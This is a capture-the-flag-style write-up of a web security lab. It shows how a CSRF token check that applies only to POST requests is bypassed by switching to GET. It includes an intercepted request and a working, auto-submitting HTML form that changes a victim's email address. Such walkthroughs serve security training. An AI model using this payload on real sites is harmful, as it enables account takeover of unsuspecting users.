CSRF where token validation depends on request method

Description

This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

Approach

After logging in with the provided credentials, I intercepted the change email request and sent it to repeater:

POST /my-account/change-email HTTP/1.1
Host: 0a480016034a1a8c800d99c3003b007b.web-security-academy.net
Cookie: session=p1P0Pwfmc5NOkfkRSjhptAVGBIKB51LE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0


email=qwe%40qwe.com&csrf=vJZ29hlEorCNt0eR9r2w3wmC0nEpdudx

I noticed that there is a CSRF token included in the request to protect against CSRF attacks. Initially, I tried creating a CSRF PoC and sending it to the victim, but it didn't work. Given the lab title, which hinted that token validation might depend on the request method, I decided to change the POST request to a GET request. Then, I generated a new CSRF PoC and sent it to the victim.

Here is the modified GET request:

GET /my-account/change-email?email=qwe%40qwe.com&csrf=vJZ29hlEorCNt0eR9r2w3wmC0nEpdudx HTTP/1.1
Host: 0a480016034a1a8c800d99c3003b007b.web-security-academy.net
Cookie: session=p1P0Pwfmc5NOkfkRSjhptAVGBIKB51LE
...

By right-clicking the request and selecting Engagement tools / Generate CSRF PoC, I generated the following HTML:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a480016034a1a8c800d99c3003b007b.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="ichyaboy&#64;hacked&#46;com" />
      <input type="hidden" name="csrf" value="vJZ29hlEorCNt0eR9r2w3wmC0nEpdudx" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

I modified the email value to a new one to avoid any errors related to reused email addresses. After copying the CSRF PoC, I placed it in my malicious page on the exploit server.

By clicking Store and Deliver exploit to victim, I saw that the lab was solved, confirming the change of the victim's email.

PreviousCSRF vulnerability with no defenses NextCSRF where token validation depends on token being present